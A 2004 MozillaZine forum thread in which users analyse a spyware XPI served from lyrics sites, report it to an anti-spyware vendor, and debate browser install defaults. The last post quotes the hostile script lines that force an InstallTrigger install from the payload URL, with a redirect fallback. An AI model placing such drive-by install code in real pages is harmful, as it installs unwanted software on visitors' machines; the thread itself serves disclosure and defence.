We got another XPISpyware
- esavior
- Posts: 1211
- Joined: July 29th, 2003, 1:57 pm
- Contact:
We got another XPISpyware
http://www.musicsonglyrics.com/T/Thursd ... lyrics.htm
Its there alright. I could only get it to popup once. but after diging through the source its in a extrenal js file.
It grabs the XPI from:
http://www2.flingstone.com/cab/sbc_netscape.xpi
You can find the code in the 4th extrenal script call, the one with all the characters. I would just paste it here but I dont know the legality in pasting their code.
Its there alright. I could only get it to popup once. but after diging through the source its in a extrenal js file.
It grabs the XPI from:
http://www2.flingstone.com/cab/sbc_netscape.xpi
You can find the code in the 4th extrenal script call, the one with all the characters. I would just paste it here but I dont know the legality in pasting their code.
Mindjunk
I didn't hear no bell...
I didn't hear no bell...
- arch
- Posts: 85
- Joined: May 4th, 2003, 8:58 am
- Contact:
I poked around xpi a bit. Here's the summary:
Xpi contains sbc_netscape.exe, it installs program called Bridge, which hijacks IE. Associated somehow with www.blazefind.com.
Xpi contains sbc_netscape.exe, it installs program called Bridge, which hijacks IE. Associated somehow with www.blazefind.com.
"No good deed goes ever unpunished"
http://archonon.sytes.net
http://archonon.sytes.net
-
- Posts: 2031
- Joined: February 6th, 2004, 11:59 am
see my proposed answer here
http://forums.mozillazine.org/viewtopic ... 828#463828
http://forums.mozillazine.org/viewtopic ... 828#463828
- esavior
- Posts: 1211
- Joined: July 29th, 2003, 1:57 pm
- Contact:
Here is what bridge is
http://www.kephyr.com/spywarescanner/li ... ndex.phtml
http://www.kephyr.com/spywarescanner/li ... ndex.phtml
Mindjunk
I didn't hear no bell...
I didn't hear no bell...
- logan
- Posts: 3453
- Joined: May 22nd, 2003, 3:51 pm
- Location: NGC 2403
- Contact:
-
- Posts: 370
- Joined: October 15th, 2003, 12:30 am
logan wrote:unless someone blindly changes the xpinstall.* defaults, it's not a problem.
I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.
- nexx
- Posts: 736
- Joined: July 29th, 2003, 1:23 am
- Location: Brisbane, Australia
- Contact:
iirc recent builds dont allow xpi installation unless the user specicially clicks on a link, so they wont popup when a page loads.
Extensions are a key part of firefox, and disabling them by default because a few sites may install spyware will probably cause more pain. Users will turn on xpiinstall to install their extensions and leave it on anyway.
Extensions are a key part of firefox, and disabling them by default because a few sites may install spyware will probably cause more pain. Users will turn on xpiinstall to install their extensions and leave it on anyway.
<a href="http://users.bigpond.net.au/nexx1/oxpmenu/" title="Office XP Menus">Office XP Menus</a> || <a href="http://scragz.com/tech/mozilla/firefox-unofficial-branding.php"> Unofficial Firefox Branding</a>
- esavior
- Posts: 1211
- Joined: July 29th, 2003, 1:57 pm
- Contact:
I actually agree with the disable by default... the people that turn it on and leave it on most likely understand what extensions are... atleast enough to know that they need to turn that option on. What I am concerned about is the newb user that the first time that see that popup is on a spywared site and wont know what to do, they my just press install. Try to remember that most people wont know what or even use extensions once fx starts getting mass deployment, everyone here uses extensions but we arent average users.
Mindjunk
I didn't hear no bell...
I didn't hear no bell...
- MonkeeSage
- Posts: 1011
- Joined: December 20th, 2002, 8:15 pm
I'd like to see a message box like AnonEmoose suggested, something along the lines of...
"This page is attempting to install [software name] on your computer using the Mozilla Installer. Software is potentially dangerous and can cause damage to your computer. In order to minimize the potential risk, you should only install software you have requested, from vendors you trust. If you understand this and wish to continue the installation, press INSTALL. If you do not understand this or did not request the software, press CANCEL."
...with the 'critical' icon on the prompt.
Shelumi`El
Jordan
S.D.G
"This page is attempting to install [software name] on your computer using the Mozilla Installer. Software is potentially dangerous and can cause damage to your computer. In order to minimize the potential risk, you should only install software you have requested, from vendors you trust. If you understand this and wish to continue the installation, press INSTALL. If you do not understand this or did not request the software, press CANCEL."
...with the 'critical' icon on the prompt.
Shelumi`El
Jordan
S.D.G
"[M]en are usually satisfied with bad argument only when their convictions rest on other grounds." --John Oman
- wildman
- Posts: 222
- Joined: June 20th, 2003, 12:20 pm
- Location: Florida
theshooter wrote:logan wrote:unless someone blindly changes the xpinstall.* defaults, it's not a problem.
I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.
Well said & it's worth repeating. We can thank Micro$oft again for some of the bad habits users develope, very few MS drivers are signed by MS so folks just tend to accept everything despite the warning. Signed Packages with md5sums, Approved Sources (white/black lists), and legitimate Quality Controls on mirrors which scan for virus/spyware/malware infections on the software they distribute. There are several similar threads in these forums. Here is one I wrote to try & summarize the problems with extensions from a sysadmin's point of view...
Extension Manager with AutoUpdate - MozillaZine Forums
http://forums.mozillazine.org/viewtopic.php?t=63373
- wildman
- Posts: 222
- Joined: June 20th, 2003, 12:20 pm
- Location: Florida
I submitted the following to the devs at SpybotS&D via this link...
SpybotS&D: Contact - Detections
http://www.safer-networking.org/index.p ... detections
Name: wildman, Email address: guess_or_pm_me@pobox.com
Email subject: Mozilla/Firefox XPI apps
Report file: http://www2.flingstone.com/cab/sbc_netscape.xpi
Hope you can find the time to visit the MozillaZine Forums & participate in this discussion...
We got another XPISpyware - MozillaZine Forums - http://forums.mozillazine.org/viewtopic.php?t=66531
...and possibly support/contribute anti-spyware sollutions to thier project in the form of a SpyBot plugin/extension.
I made a similar comment on a Moz related blog recently, that may interest you.
Robert Accettura: Spyware Blaster Supports Mozilla
http://robert.accettura.com/archives/000347.shtml
SpybotS&D: Contact - Detections
http://www.safer-networking.org/index.p ... detections
Name: wildman, Email address: guess_or_pm_me@pobox.com
Email subject: Mozilla/Firefox XPI apps
Report file: http://www2.flingstone.com/cab/sbc_netscape.xpi
Hope you can find the time to visit the MozillaZine Forums & participate in this discussion...
We got another XPISpyware - MozillaZine Forums - http://forums.mozillazine.org/viewtopic.php?t=66531
...and possibly support/contribute anti-spyware sollutions to thier project in the form of a SpyBot plugin/extension.
I made a similar comment on a Moz related blog recently, that may interest you.
Robert Accettura: Spyware Blaster Supports Mozilla
http://robert.accettura.com/archives/000347.shtml
- esavior
- Posts: 1211
- Joined: July 29th, 2003, 1:57 pm
- Contact:
Just had it pop up at another site, same spyware though
http://www.lyricsdomain.com/2/brand_new/
http://www.lyricsdomain.com/2/brand_new/
Mindjunk
I didn't hear no bell...
I didn't hear no bell...
- Kraftwerk
- Posts: 106
- Joined: April 2nd, 2004, 3:04 pm
nexx wrote:iirc recent builds dont allow xpi installation unless the user specicially clicks on a link, so they wont popup when a page loads.
I'm using the 20040403 build and it still tries to install.. :/
there's some kind of stupid script trying to do that I guess, it's not in the html itself (I think)..
- esavior
- Posts: 1211
- Joined: July 29th, 2003, 1:57 pm
- Contact:
aye its a extrenal script,
trys
InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});
and if that fails
location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');
}
and I am using the newest build and still its happening.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7b) Gecko/20040404 Firefox/0.8.0+ (mmoy-O2-GL7-SSE2-crc32-gifalloc)
trys
InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});
and if that fails
location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');
}
and I am using the newest build and still its happening.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7b) Gecko/20040404 Firefox/0.8.0+ (mmoy-O2-GL7-SSE2-crc32-gifalloc)
Mindjunk
I didn't hear no bell...
I didn't hear no bell...